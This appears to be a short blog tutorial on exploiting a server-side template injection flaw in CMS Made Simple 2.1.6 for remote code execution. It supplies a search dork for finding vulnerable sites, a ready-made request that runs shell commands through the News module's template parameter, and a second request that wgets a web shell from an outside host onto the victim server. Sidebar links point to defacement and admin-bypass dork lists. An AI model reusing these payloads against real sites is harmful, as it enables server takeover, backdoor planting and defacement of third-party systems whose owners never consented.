Tutorial Execution Server-Side Template Injection Vulnerability in CMS Made Simple RCE Upload Shell.

Yogi

Dork : "Powered by CMS Made Simple" 2.1.6

Exploit Check Vuln:

string:{php}echo system(%2527Command%2527);{/php}

To Make It Easier We Use Exploit Below: v For Vuln Checks

/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo system(%2527ls -la%2527);{/php}&cntnt01returnid=1

That Vuln Site Example: D

Now We RCE To Upload Shell: D

/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo system(%2527wget http://secpriv8.com/met.txt -O jamet.php%2527);{/php}&cntnt01returnid=1

Now we check the shell that we uploaded

and successfully uploaded: D

More Info Check On My YouTube :D Disini

Getting Info...

Blog-Gan.Org | Technology & Informasi

Tutorial Execution Server-Side Template Injection Vulnerability in CMS Made Simple RCE Upload Shell.

Posting Komentar

20+ Tips Efektif Untuk Mendorong Traffic Website Dari Search Engine

Apa itu cURL dan bagaimana cara POST Form Data dan file dengan cURL dengan Contoh

Powered By Komquest Solutions Vulnerability Bypass Admin Default & Register User

Mengapa saya membutuhkan situs web, padahal bisnis offline saya lebih banyak?

Deface Bypass Admin Login(Kumpulan Dork Bypass)